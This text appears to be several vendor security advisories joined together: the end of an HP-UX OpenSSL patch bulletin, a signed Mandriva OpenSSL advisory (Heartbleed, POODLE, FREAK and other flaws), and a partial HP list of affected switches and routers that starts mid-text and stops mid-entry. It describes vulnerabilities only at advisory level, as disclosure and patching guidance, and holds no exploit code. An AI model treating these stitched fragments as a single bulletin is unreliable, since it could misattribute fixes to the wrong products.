(AV:N/AC:M/Au:N/C:N/I:P/A:N) 4.3\n===========================================================\n Information on CVSS is documented\n in HP Customer Notice: HPSN-2008-002\n\nRESOLUTION\n\nHP has provided the following updates to resolve these vulnerabilities. The\nupdates are available from the following ftp site. \n\nftp://ssl098zc:Secure12@ftp.usa.hp.com\n\nUser name: ssl098zc Password: (NOTE: Case sensitive) Secure12\n\nHP-UX Release\n HP-UX OpenSSL version\n\nB.11.11 (11i v1)\n A.00.09.08zc.001_HP-UX_B.11.11_32+64.depot\n\nB.11.23 (11i v2)\n A.00.09.08zc.002_HP-UX_B.11.23_IA-PA.depot\n\nB.11.31 (11i v3)\n A.00.09.08zc.003_HP-UX_B.11.31_IA-PA.depot\n\nMANUAL ACTIONS: Yes - Update\n\nInstall OpenSSL A.00.09.08zc or subsequent\n\nPRODUCT SPECIFIC INFORMATION\n\nHP-UX Software Assistant: HP-UX Software Assistant is an enhanced application\nthat replaces HP-UX Security Patch Check. It analyzes all Security Bulletins\nissued by HP and lists recommended actions that may apply to a specific HP-UX\nsystem. It can also download patches and create a depot automatically. For\nmore information see: https://www.hp.com/go/swa\n\nThe following text is for use by the HP-UX Software Assistant. \n\nAFFECTED VERSIONS\n\nHP-UX B.11.11\n==================\nopenssl.OPENSSL-CER\nopenssl.OPENSSL-CONF\nopenssl.OPENSSL-DOC\nopenssl.OPENSSL-INC\nopenssl.OPENSSL-LIB\nopenssl.OPENSSL-MAN\nopenssl.OPENSSL-MIS\nopenssl.OPENSSL-PRNG\nopenssl.OPENSSL-PVT\nopenssl.OPENSSL-RUN\nopenssl.OPENSSL-SRC\naction: install revision A.00.09.08zc.001 or subsequent\n\nHP-UX B.11.23\n==================\nopenssl.OPENSSL-CER\nopenssl.OPENSSL-CONF\nopenssl.OPENSSL-DOC\nopenssl.OPENSSL-INC\nopenssl.OPENSSL-LIB\nopenssl.OPENSSL-MAN\nopenssl.OPENSSL-MIS\nopenssl.OPENSSL-PRNG\nopenssl.OPENSSL-PVT\nopenssl.OPENSSL-RUN\nopenssl.OPENSSL-SRC\naction: install revision A.00.09.08zc.002 or subsequent\n\nHP-UX B.11.31\n==================\nopenssl.OPENSSL-CER\nopenssl.OPENSSL-CONF\nopenssl.OPENSSL-DOC\nopenssl.OPENSSL-INC\nopenssl.OPENSSL-LIB\nopenssl.OPENSSL-MAN\nopenssl.OPENSSL-MIS\nopenssl.OPENSSL-PRNG\nopenssl.OPENSSL-PVT\nopenssl.OPENSSL-RUN\nopenssl.OPENSSL-SRC\naction: install revision A.00.09.08zc.003 or subsequent\n\nEND AFFECTED VERSIONS\n\nHISTORY\nVersion:1 (rev.1) - 28 October 2014 Initial release\nThird Party Security Patches: Third party security patches that are to be\ninstalled on systems running HP software products should be applied in\naccordance with the customer\u0027s patch management policy. \n\nSupport: For issues about implementing the recommendations of this Security\nBulletin, contact normal HP Services support channel. For other issues about\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com. \n\nReport: To report a potential security vulnerability with any HP supported\nproduct, send Email to: security-alert@hp.com\n\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\nalerts via Email:\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\n\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\navailable here:\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\n\nSoftware Product Category: The Software Product Category is represented in\nthe title by the two characters following HPSB. \n\n3C = 3COM\n3P = 3rd Party Software\nGN = HP General Software\nHF = HP Hardware and Firmware\nMP = MPE/iX\nMU = Multi-Platform Software\nNS = NonStop Servers\nOV = OpenVMS\nPI = Printing and Imaging\nPV = ProCurve\nST = Storage Software\nTU = Tru64 UNIX\nUX = HP-UX\n\nCopyright 2014 Hewlett-Packard Development Company, L.P. \nHewlett-Packard Company shall not be liable for technical or editorial errors\nor omissions contained herein. The information provided is provided \"as is\"\nwithout warranty of any kind. To the extent permitted by law, neither HP or\nits affiliates, subcontractors or suppliers will be liable for\nincidental,special or consequential damages including downtime cost; lost\nprofits; damages relating to the procurement of substitute products or\nservices; or damages for loss of data, or software restoration. The\ninformation in this document is subject to change without notice. \nHewlett-Packard Company and the names of Hewlett-Packard products referenced\nherein are trademarks of Hewlett-Packard Company in the United States and\nother countries. Other product and company names mentioned herein may be\ntrademarks of their respective owners. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n _______________________________________________________________________\n\n Mandriva Linux Security Advisory MDVSA-2015:062\n http://www.mandriva.com/en/support/security/\n _______________________________________________________________________\n\n Package : openssl\n Date : March 27, 2015\n Affected: Business Server 2.0\n _______________________________________________________________________\n\n Problem Description:\n\n Multiple vulnerabilities has been discovered and corrected in openssl:\n \n Race condition in the ssl3_read_bytes function in s3_pkt.c in OpenSSL\n through 1.0.1g, when SSL_MODE_RELEASE_BUFFERS is enabled, allows\n remote attackers to inject data across sessions or cause a denial of\n service (use-after-free and parsing error) via an SSL connection in\n a multithreaded environment (CVE-2010-5298). \n \n The Montgomery ladder implementation in OpenSSL through 1.0.0l does\n not ensure that certain swap operations have a constant-time behavior,\n which makes it easier for local users to obtain ECDSA nonces via a\n FLUSH+RELOAD cache side-channel attack (CVE-2014-0076). \n \n The (1) TLS and (2) DTLS implementations in OpenSSL 1.0.1 before\n 1.0.1g do not properly handle Heartbeat Extension packets, which allows\n remote attackers to obtain sensitive information from process memory\n via crafted packets that trigger a buffer over-read, as demonstrated\n by reading private keys, related to d1_both.c and t1_lib.c, aka the\n Heartbleed bug (CVE-2014-0160). \n \n OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before\n 1.0.1h does not properly restrict processing of ChangeCipherSpec\n messages, which allows man-in-the-middle attackers to trigger use of a\n zero-length master key in certain OpenSSL-to-OpenSSL communications,\n and consequently hijack sessions or obtain sensitive information,\n via a crafted TLS handshake, aka the CCS Injection vulnerability\n (CVE-2014-0224). \n \n The SSL protocol 3.0, as used in OpenSSL through 1.0.1i and other\n products, uses nondeterministic CBC padding, which makes it easier\n for man-in-the-middle attackers to obtain cleartext data via a\n padding-oracle attack, aka the POODLE issue (CVE-2014-3566). NOTE: this issue\n became relevant after the CVE-2014-3568 fix (CVE-2014-3569). \n \n The BN_sqr implementation in OpenSSL before 0.9.8zd, 1.0.0 before\n 1.0.0p, and 1.0.1 before 1.0.1k does not properly calculate the square\n of a BIGNUM value, which might make it easier for remote attackers to\n defeat cryptographic protection mechanisms via unspecified vectors,\n related to crypto/bn/asm/mips.pl, crypto/bn/asm/x86_64-gcc.c, and\n crypto/bn/bn_asm.c (CVE-2014-3570). \n \n The ssl3_get_key_exchange function in s3_clnt.c in OpenSSL before\n 0.9.8zd, 1.0.0 before 1.0.0p, and 1.0.1 before 1.0.1k allows remote\n SSL servers to conduct ECDHE-to-ECDH downgrade attacks and trigger\n a loss of forward secrecy by omitting the ServerKeyExchange message\n (CVE-2014-3572). \n \n OpenSSL before 0.9.8zd, 1.0.0 before 1.0.0p, and 1.0.1 before 1.0.1k\n does not enforce certain constraints on certificate data, which allows\n remote attackers to defeat a fingerprint-based certificate-blacklist\n protection mechanism by including crafted data within a\n certificate\u0026#039;s unsigned portion, related to crypto/asn1/a_verify.c,\n crypto/dsa/dsa_asn1.c, crypto/ecdsa/ecs_vrf.c, and crypto/x509/x_all.c\n (CVE-2014-8275). \n \n The ssl3_get_key_exchange function in s3_clnt.c in OpenSSL before\n 0.9.8zd, 1.0.0 before 1.0.0p, and 1.0.1 before 1.0.1k allows remote SSL\n servers to conduct RSA-to-EXPORT_RSA downgrade attacks and facilitate\n brute-force decryption by offering a weak ephemeral RSA key in a\n noncompliant role, related to the FREAK issue. NOTE: the scope of\n this CVE is only client code based on OpenSSL, not EXPORT_RSA issues\n associated with servers or other TLS implementations (CVE-2015-0204). \n \n The ssl3_get_cert_verify function in s3_srvr.c in OpenSSL 1.0.0 before\n 1.0.0p and 1.0.1 before 1.0.1k accepts client authentication with a\n Diffie-Hellman (DH) certificate without requiring a CertificateVerify\n message, which allows remote attackers to obtain access without\n knowledge of a private key via crafted TLS Handshake Protocol traffic\n to a server that recognizes a Certification Authority with DH support\n (CVE-2015-0205). \n \n The PKCS#7 implementation in OpenSSL before 0.9.8zf, 1.0.0 before\n 1.0.0r, 1.0.1 before 1.0.1m, and 1.0.2 before 1.0.2a does not\n properly handle a lack of outer ContentInfo, which allows attackers to\n cause a denial of service (NULL pointer dereference and application\n crash) by leveraging an application that processes arbitrary PKCS#7\n data and providing malformed data with ASN.1 encoding, related to\n crypto/pkcs7/pk7_doit.c and crypto/pkcs7/pk7_lib.c (CVE-2015-0289). \n \n The updated packages have been upgraded to the 1.0.1m version where\n these security flaws has been fixed. \n _______________________________________________________________________\n\n References:\n\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-5298\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0076\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0195\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0198\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0221\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0224\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3470\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3513\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3566\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3567\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3569\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3570\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3571\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3572\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8275\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0204\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0205\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0206\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0209\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0286\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0287\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0288\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0289\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0293\n http://openssl.org/news/secadv_20150108.txt\n http://openssl.org/news/secadv_20150319.txt\n _______________________________________________________________________\n\n Updated Packages:\n\n Mandriva Business Server 2/X86_64:\n 324a85f7e1165ab02881e44dbddaf599 mbs2/x86_64/lib64openssl1.0.0-1.0.1m-1.mbs2.x86_64.rpm\n 9c0bfb6ebd43cb6d81872abf71b4f85f mbs2/x86_64/lib64openssl-devel-1.0.1m-1.mbs2.x86_64.rpm\n 58df54e72ca7270210c7d8dd23df402b mbs2/x86_64/lib64openssl-engines1.0.0-1.0.1m-1.mbs2.x86_64.rpm\n b5313ffb5baaa65aea05eb05486d309a mbs2/x86_64/lib64openssl-static-devel-1.0.1m-1.mbs2.x86_64.rpm\n a9890ce4c33630cb9e00f3b2910dd784 mbs2/x86_64/openssl-1.0.1m-1.mbs2.x86_64.rpm \n 521297a5fe26e2de0c1222d8d03382d1 mbs2/SRPMS/openssl-1.0.1m-1.mbs2.src.rpm\n _______________________________________________________________________\n\n To upgrade automatically use MandrivaUpdate or urpmi. The verification\n of md5 checksums and GPG signatures is performed automatically for you. \n\n All packages are signed by Mandriva for security. You can obtain the\n GPG public key of the Mandriva Security Team by executing:\n\n gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98\n\n You can view other update advisories for Mandriva Linux at:\n\n http://www.mandriva.com/en/support/security/advisories/\n\n If you want to report vulnerabilities, please contact\n\n security_(at)_mandriva.com\n _______________________________________________________________________\n\n Type Bits/KeyID Date User ID\n pub 1024D/22458A98 2000-07-10 Mandriva Security Team\n \u003csecurity*mandriva.com\u003e\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.4.12 (GNU/Linux)\n\niD8DBQFVFTm1mqjQ0CJFipgRAoYFAKCaubn00colzVNnUBFjSElyDptGMQCfaGoS\nkz0ex6eI6hA6qSwklA2NoXY=\n=GYjX\n-----END PGP SIGNATURE-----\n. \nPlease refer to the RESOLUTION\n section below for a list of impacted products. \n\nNote: mitigation instructions are included below if the following software\nupdates cannot be applied. \n\nFamily\n Fixed Version\n HP Branded Products Impacted\n H3C Branded Products Impacted\n 3Com Branded Products Impacted\n CVE\n\n12900 Switch Series\n R1005P15\n JG619A HP FF 12910 Switch AC Chassis\nJG621A HP FF 12910 Main Processing Unit\nJG632A HP FF 12916 Switch AC Chassis\nJG634A HP FF 12916 Main Processing Unit\n\n CVE-2014-3566\nCVE-2014-3567\nCVE-2014-3568\n\n12500\n R1828P06\n JC085A HP A12518 Switch Chassis\nJC086A HP A12508 Switch Chassis\nJC652A HP 12508 DC Switch Chassis\nJC653A HP 12518 DC Switch Chassis\nJC654A HP 12504 AC Switch Chassis\nJC655A HP 12504 DC Switch Chassis\nJF430A HP A12518 Switch Chassis\nJF430B HP 12518 Switch Chassis\nJF430C HP 12518 AC Switch Chassis\nJF431A HP A12508 Switch Chassis\nJF431B HP 12508 Switch Chassis\nJF431C HP 12508 AC Switch Chassis\nJC072B HP 12500 Main Processing Unit\nJC808A HP 12500 TAA Main Processing Unit\n H3C S12508 Routing Switch(AC-1) (0235A0GE)\nH3C S12518 Routing Switch(AC-1) (0235A0GF)\nH3C S12508 Chassis (0235A0E6)\nH3C S12508 Chassis (0235A38N)\nH3C S12518 Chassis (0235A0E7)\nH3C S12518 Chassis (0235A38M)\nH3C 12508 DC Switch Chassis (0235A38L)\nH3C 12518 DC Switch Chassis (0235A38K)\n\n CVE-2014-3566\nCVE-2014-3568\n\n12500 (Comware v7)\n R7328P04\n JC085A HP A12518 Switch Chassis\nJC086A HP A12508 Switch Chassis\nJC652A HP 12508 DC Switch Chassis\nJC653A HP 12518 DC Switch Chassis\nJC654A HP 12504 AC Switch Chassis\nJC655A HP 12504 DC Switch Chassis\nJF430A HP A12518 Switch Chassis\nJF430B HP 12518 Switch Chassis\nJF430C HP 12518 AC Switch Chassis\nJF431A HP A12508 Switch Chassis\nJF431B HP 12508 Switch Chassis\nJF431C HP 12508 AC Switch Chassis\nJC072B HP 12500 Main Processing Unit\nJG497A HP 12500 MPU w/Comware V7 OS\nJG782A HP FF 12508E AC Switch Chassis\nJG783A HP FF 12508E DC Switch Chassis\nJG784A HP FF 12518E AC Switch Chassis\nJG785A HP FF 12518E DC Switch Chassis\nJG802A HP FF 12500E MPU\n H3C S12508 Routing Switch(AC-1) (0235A0GE)\nH3C S12518 Routing Switch(AC-1) (0235A0GF)\nH3C S12508 Chassis (0235A0E6)\nH3C S12508 Chassis (0235A38N)\nH3C S12518 Chassis (0235A0E7)\nH3C S12518 Chassis (0235A38M)\nH3C 12508 DC Switch Chassis (0235A38L)\nH3C 12518 DC Switch Chassis (0235A38K)\n\n CVE-2014-3566\nCVE-2014-3567\nCVE-2014-3568\n\n11900 Switch Series\n R2111P06\n JG608A HP FF 11908-V Switch Chassis\nJG609A HP FF 11900 Main Processing Unit\n\n CVE-2014-3566\nCVE-2014-3567\nCVE-2014-3568\n\n10500 Switch Series (Comware v5)\n R1208P10\n JC611A HP 10508-V Switch Chassis\nJC612A HP 10508 Switch Chassis\nJC613A HP 10504 Switch Chassis\nJC614A HP 10500 Main Processing Unit\nJC748A HP 10512 Switch Chassis\nJG375A HP 10500 TAA Main Processing Unit\nJG820A HP 10504 TAA Switch Chassis\nJG821A HP 10508 TAA Switch Chassis\nJG822A HP 10508-V TAA Switch Chassis\nJG823A HP 10512 TAA Switch Chassis\n\n CVE-2014-3566\nCVE-2014-3568\n\n10500 Switch Series (Comware v7)\n R2111P06\n JC611A HP 10508-V Switch Chassis\nJC612A HP 10508 Switch Chassis\nJC613A HP 10504 Switch Chassis\nJC748A HP 10512 Switch Chassis\nJG820A HP 10504 TAA Switch Chassis\nJG821A HP 10508 TAA Switch Chassis\nJG822A HP 10508-V TAA Switch Chassis\nJG823A HP 10512 TAA Switch Chassis\nJG496A HP 10500 Type A MPU w/Comware v7 OS\n\n CVE-2014-3566\nCVE-2014-3567\nCVE-2014-3568\n\n9500E\n R1828P06\n JC124A HP A9508 Switch Chassis\nJC124B HP 9505 Switch Chassis\nJC125A HP A9512 Switch Chassis\nJC125B HP 9512 Switch Chassis\nJC474A HP A9508-V Switch Chassis\nJC474B HP 9508-V Switch Chassis\n H3C S9505E Routing-Switch Chassis (0235A0G6)\nH3C S9512E Routing-Switch Chassis (0235A0G7)\nH3C S9508E-V Routing-Switch Chassis (0235A38Q)\nH3C S9505E Chassis w/ Fans (0235A38P)\nH3C S9512E Chassis w/ Fans (0235A38R)\n\n CVE-2014-3566\nCVE-2014-3568\n\n7900\n R2122\n JG682A HP FlexFabric 7904 Switch Chassis\nJH001A HP FF 7910 2.4Tbps Fabric / MPU\nJG842A HP FF 7910 7.2Tbps Fabric / MPU\nJG841A HP FF 7910 Switch Chassis\n\n CVE-2014-3566\nCVE-2014-3567\nCVE-2014-3568\n\n7500 Switch Series\n R6708P10\n JC666A HP A7503-S 144 Gbps Fab/MPU w 24p Gig-T\nJC697A HP A7502 TAA Main Processing Unit\nJC698A HP A7503S 144 Gbps TAA Fab/MPU w 24p GbE\nJC699A HP A7500 384Gbps TAA Fab/MPU w 2p 10-GbE\nJC700A HP A7500 384 Gbps TAA Fabric / MPU\nJC701A HP A7510 768 Gbps TAA Fabric / MPU\nJD193A HP 384 Gbps A7500 Fab Mod w/2 XFP Ports\nJD193B HP 7500 384Gbps Fab Mod w/2 XFP Ports\nJD194A HP 384 Gbps Fabric A7500 Module\nJD194B HP 7500 384Gbps Fabric Module\nJD195A HP 7500 384Gbps Advanced Fabric Module\nJD196A HP 7502 Fabric Module\nJD220A HP 7500 768Gbps Fabric Module\nJD238A HP A7510 Switch Chassis\nJD238B HP 7510 Switch Chassis\nJD239A HP A7506 Switch Chassis\nJD239B HP 7506 Switch Chassis\nJD240A HP A7503 Switch Chassis\nJD240B HP 7503 Switch Chassis\nJD241A HP A7506 Vertical Switch Chassis\nJD241B HP 7506-V Switch Chassis\nJD242A HP A7502 Switch Chassis\nJD242B HP 7502 Switch Chassis\nJD243A HP A7503 Switch Chassis w/1 Fabric Slot\nJD243B HP 7503-S Switch Chassis w/1 Fabric Slot\n H3C S7502E Ethernet Switch Chassis with Fan (0235A0G4)\nH3C S7503E Ethernet Switch Chassis with Fan (0235A0G2)\nH3C S7503E-S Ethernet Switch Chassis with Fan (0235A0G5)\nH3C S7506E Ethernet Switch Chassis with Fan (0235A0G1)\nH3C S7506E-V Ethernet Switch Chassis with Fan (0235A0G3)\nH3C S7510E Ethernet Switch Chassis with Fan (0235A0G0)\nH3C S7502E Chassis w/ fans (0235A29A)\nH3C S7503E Chassis w/ fans (0235A27R)\nH3C S7503E-S Chassis w/ fans (0235A33R)\nH3C S7506E Chassis w/ fans (0235A27Q)\nH3C S7506E-V Chassis w/ fans (0235A27S)\n\n CVE-2014-3566\nCVE-2014-3568\n\nHSR6800\n R3303P18\n JG361A HP HSR6802 Router Chassis\nJG362A HP HSR6804 Router Chassis\nJG363A HP HSR6808 Router Chassis\nJG364A HP HSR6800 RSE-X2 Router MPU\nJG779A HP HSR6800 RSE-X2 Router TAA MPU\n\n CVE-2014-3566\nCVE-2014-3568\n\nHSR6800 Russian Version\n R3303P18\n JG361A HP HSR6802 Router Chassis\nJG362A HP HSR6804 Router Chassis\nJG363A HP HSR6808 Router Chassis\nJG364A HP HSR6800 RSE-X2 Router MPU\nJG779A HP HSR6800 RSE-X2 Router TAA MPU\n\n CVE-2014-3566\nCVE-2014-3568\n\nHSR6602\n R3303P18\n JG353A HP HSR6602-G Router\nJG354A HP HSR6602-XG Router\nJG776A HP HSR6602-G TAA Router\nJG777A HP HSR6602-XG TAA Router\nJG777A HP HSR6602-XG TAA Router\n\n CVE-2014-3566\nCVE-2014-3568\n\nHSR6602 Russian Version\n R3303P18\n JG353A HP HSR6602-G Router\nJG354A HP HSR6602-XG Router\nJG776A HP HSR6602-G TAA Router\nJG777A HP HSR6602-XG TAA Router\n\n CVE-2014-3566\nCVE-2014-3568\n\n6602\n R3303P18\n JC176A HP 6602 Router Chassis\n H3C SR6602 1U Router Host (0235A27D)\n\n CVE-2014-3566\nCVE-2014-3568\n\n6602 Russian Version\n R3303P18\n JC176A HP 6602 Router Chassis\n H3C SR6602 1U Router Host (0235A27D)\n\n CVE-2014-3566\nCVE-2014-3568\n\nA6600\n R3303P18\n JC165A HP 6600 RPE-X1 Router Module\nJC177A HP 6608 Router\nJC177B HP A6608 Router Chassis\nJC178A HP 6604 Router Chassis\nJC178B HP A6604 Router Chassis\nJC496A HP 6616 Router Chassis\nJC566A HP A6600 RSE-X1 Main Processing Unit\nJG780A HP 6600 RSE-X1 Router TAA MPU\n H3C RT-SR66-RPE-X1-H3 (0231A761)\nH3C RT-SR6608-OVS-H3 (0235A32X)\nH3C RT-SR6604-OVS-H3 (0235A37X)\nH3C SR6616 Router Chassis (0235A41D)\n\n CVE-2014-3566\nCVE-2014-3568\n\nA6600 Russian Version\n R3303P18\n JC165A HP 6600 RPE-X1 Router Module\nJC177A HP 6608 Router\nJC177B HP A6608 Router Chassis\nJC178A HP 6604 Router Chassis\nJC178B HP A6604 Router Chassis\nJC496A HP 6616 Router Chassis\nJC566A HP A6600 RSE-X1 Main Processing Unit\nJG780A HP 6600 RSE-X1 Router TAA MPU\n H3C RT-SR66-RPE-X1-H3 (0231A761)\nH3C RT-SR6608-OVS-H3 (0235A32X)\nH3C RT-SR6604-OVS-H3 (0235A37X)\nH3C SR6616 Router Chassis (0235A41D)\n\n CVE-2014-3566\nCVE-2014-3568\n\n6600 MCP\n R3303P18\n JC177A HP 6608 Router\nJC177B HP A6608 Router Chassis\nJC178A HP 6604 Router Chassis\nJC178B HP A6604 Router Chassis\nJC496A HP 6616 Router Chassis\nJG778A HP 6600 MCP-X2 Router TAA MPU. JG355A HP 6600 MCP-X1 Router MPU\nJG356A HP 6600 MCP-X2 Router MPU\n H3C RT-SR6608-OVS-H3 (0235A32X)\nH3C RT-SR6604-OVS-H3 (0235A37X)\nH3C SR6616 Router Chassis (0235A41D)\n\n CVE-2014-3566\nCVE-2014-3568\n\n6600 MCP Russian Version\n R3303P18\n JC177A HP 6608 Router\nJC177B HP A6608 Router Chassis\nJC178A HP 6604 Router Chassis\nJC178B HP A6604 Router Chassis\nJC496A HP 6616 Router Chassis\nJG355A HP 6600 MCP-X1 Router MPU\nJG356A HP 6600 MCP-X2 Router MPU\nJG776A HP HSR6602-G TAA Router\nJG777A HP HSR6602-XG TAA Router\nJG778A HP 6600 MCP-X2 Router TAA MPU\n\n H3C RT-SR6608-OVS-H3 (0235A32X)\nH3C RT-SR6604-OVS-H3 (0235A37X)\nH3C SR6616 Router Chassis (0235A41D)\n\n CVE-2014-3566\nCVE-2014-3568\n\n5920 Switch Series\n R2311P05\n JG296A HP 5920AF-24XG Switch\nJG555A HP 5920AF-24XG TAA Switch\n\n CVE-2014-3566\nCVE-2014-3567\nCVE-2014-3568\n\n5900 Switch Series\n R2311P05\n JC772A HP 5900AF-48XG-4QSFP+ Switch\nJG336A HP 5900AF-48XGT-4QSFP+ Switch\nJG510A HP 5900AF-48G-4XG-2QSFP+ Switch\nJG554A HP 5900AF-48XG-4QSFP+ TAA Switch\nJG838A HP FF 5900CP-48XG-4QSFP+ Switch\n\n CVE-2014-3566\nCVE-2014-3567\nCVE-2014-3568\n\n5830 Switch Series\n R1118P11\n JC691A HP A5830AF-48G Switch w/1 Interface Slot\nJC694A HP A5830AF-96G Switch\nJG316A HP 5830AF-48G TAA Switch w/1 Intf Slot\nJG374A HP 5830AF-96G TAA Switch\n\n CVE-2014-3566\nCVE-2014-3568\n\n5820 Switch Series\n R1809P03\n JC102A HP 5820-24XG-SFP+ Switch\nJC106A HP 5820-14XG-SFP+ Switch with 2 Slots\nJG219A HP 5820AF-24XG Switch\nJG243A HP 5820-24XG-SFP+ TAA-compliant Switch\nJG259A HP 5820X-14XG-SFP+ TAA Switch w 2 Slots\n H3C S5820X-28C 14 port (SFP Plus ) Plus 4-port BT (RJ45) Plus 2 media\nmodules Plus OSM (0235A37L)\nH3C S5820X-28S 24-port 10GBASE-X (SFP Plus ) Plus 4-port 10/100/1000BASE-T\n(RJ45) (0235A370)\n\n CVE-2014-3566\nCVE-2014-3568\n\n5800 Switch Series\n R1809P03\n JC099A HP 5800-24G-PoE Switch\nJC100A HP 5800-24G Switch\nJC101A HP 5800-48G Switch with 2 Slots\nJC103A HP 5800-24G-SFP Switch\nJC104A HP 5800-48G-PoE Switch\nJC105A HP 5800-48G Switch\nJG225A HP 5800AF-48G Switch\nJG242A HP 5800-48G-PoE+ TAA Switch w 2 Slots\nJG254A HP 5800-24G-PoE+ TAA-compliant Switch\nJG255A HP 5800-24G TAA-compliant Switch\nJG256A HP 5800-24G-SFP TAA Switch w 1 Intf Slt\nJG257A HP 5800-48G-PoE+ TAA Switch with 1 Slot\nJG258A HP 5800-48G TAA Switch w 1 Intf Slot\n H3C S5800-32C - 24-port 1BT Plus 4-port (SFP Plus ) Plus 1 media slot\n(0235A36U)\nH3C S5800-32C-PWR - 24-port 10/100/1000BASE-T (RJ45) Plus 4-port 10GBASE-X\n(SFP Plus ) Plus 1 media module PoE (0235A36S)\nH3C S5800-32F 24-port 1000BASE-X (SFP) Plus 4-port 10GBASE-X (SFP Plus ) Plus\nmedia module (no power) (0235A374)\nH3C S5800-56C 48-port 10/100/1000BASE-T (RJ45) Plus 4port 10GBASE-X (SFP Plus\n) Plus media module (0235A379)\nH3C S5800-56C-PWR 48-port BT Plus 4 port (SFP Plus ) Plus media module\n(0235A378)\nH3C S5800-60C-PWR 48-port BT Plus 4-port SFP Plus 2 media modules Plus OSM\n(0235A36W)\n\n CVE-2014-3566\nCVE-2014-3568\n\n5700\n R2311P05\n JG894A HP FF 5700-48G-4XG-2QSFP+ Switch\nJG895A HP FF 5700-48G-4XG-2QSFP+ TAA Switch\nJG896A HP FF 5700-40XG-2QSFP+ Switch\nJG897A HP FF 5700-40XG-2QSFP+ TAA Switch\nJG898A HP FF 5700-32XGT-8XG-2QSFP+ Switch\nJG899A HP FF 5700-32XGT-8XG-2QSFP+ TAA Switch\n\n CVE-2014-3566\nCVE-2014-3567\nCVE-2014-3568\n\n5500 HI Switch Series\n R5501P06\n JG311A HP HI 5500-24G-4SFP w/2 Intf Slts Switch\nJG312A HP HI 5500-48G-4SFP w/2 Intf Slts Switch\nJG541A HP 5500-24G-PoE+-4SFP HI Switch w/2 Slt\nJG542A HP 5500-48G-PoE+-4SFP HI Switch w/2 Slt\nJG543A HP 5500-24G-SFP HI Switch w/2 Intf Slt\nJG679A HP 5500-24G-PoE+-4SFP HI TAA Swch w/2Slt\nJG680A HP 5500-48G-PoE+-4SFP HI TAA Swch w/2Slt\nJG681A HP 5500-24G-SFP HI TAA Swch w/2Slt\n\n CVE-2014-3566\nCVE-2014-3568\n\n5500 EI Switch Series\n R2221P08\n JD373A HP 5500-24G DC EI Switch\nJD374A HP 5500-24G-SFP EI Switch\nJD375A HP 5500-48G EI Switch\nJD376A HP 5500-48G-PoE EI Switch\nJD377A HP 5500-24G EI Switch\nJD378A HP 5500-24G-PoE EI Switch\nJD379A HP 5500-24G-SFP DC EI Switch\nJG240A HP 5500-48G-PoE+ EI Switch w/2 Intf Slts\nJG241A HP 5500-24G-PoE+ EI Switch w/2 Intf Slts\nJG249A HP 5500-24G-SFP EI TAA Switch w 2 Slts\nJG250A HP 5500-24G EI TAA Switch w 2 Intf Slts\nJG251A HP 5500-48G EI TAA Switch w 2 Intf Slts\nJG252A HP 5500-24G-PoE+ EI TAA Switch w/2 Slts\nJG253A HP 5500-48G-PoE+ EI TAA Switch w/2 Slts\n H3C S5500-28C-EI Ethernet Switch (0235A253)\nH3C S5500-28F-EI Eth Switch AC Single (0235A24U)\nH3C S5500-52C-EI Ethernet Switch (0235A24X)\nH3C S5500-28C-EI-DC Ethernet Switch (0235A24S)\nH3C S5500-28C-PWR-EI Ethernet Switch (0235A255)\nH3C S5500-28F-EI Eth Swtch DC Single Pwr (0235A259)\nH3C S5500-52C-PWR-EI Ethernet Switch (0235A251)\n\n CVE-2014-3566\nCVE-2014-3568\n\n5500 SI Switch Series\n R2221P08\n JD369A HP 5500-24G SI Switch\nJD370A HP 5500-48G SI Switch\nJD371A HP 5500-24G-PoE SI Switch\nJD372A HP 5500-48G-PoE SI Switch\nJG238A HP 5500-24G-PoE+ SI Switch w/2 Intf Slts\nJG239A HP 5500-48G-PoE+ SI Switch w/2 Intf Slts\n H3C S5500-28C-SI Ethernet Switch (0235A04U)\nH3C S5500-52C-SI Ethernet Switch (0235A04V)\nH3C S5500-28C-PWR-SI Ethernet Switch (0235A05H)\nH3C S5500-52C-PWR-SI Ethernet Switch (0235A05J)\n\n CVE-2014-3566\nCVE-2014-3568\n\n5130 EI switch Series\n R3108P03\n JG932A HP 5130-24G-4SFP+ EI Switch\nJG933A HP 5130-24G-SFP-4SFP+ EI Switch\nJG934A HP 5130-48G-4SFP+ EI Switch\nJG936A HP 5130-24G-PoE+-4SFP+ EI Swch\nJG937A HP 5130-48G-PoE+-4SFP+ 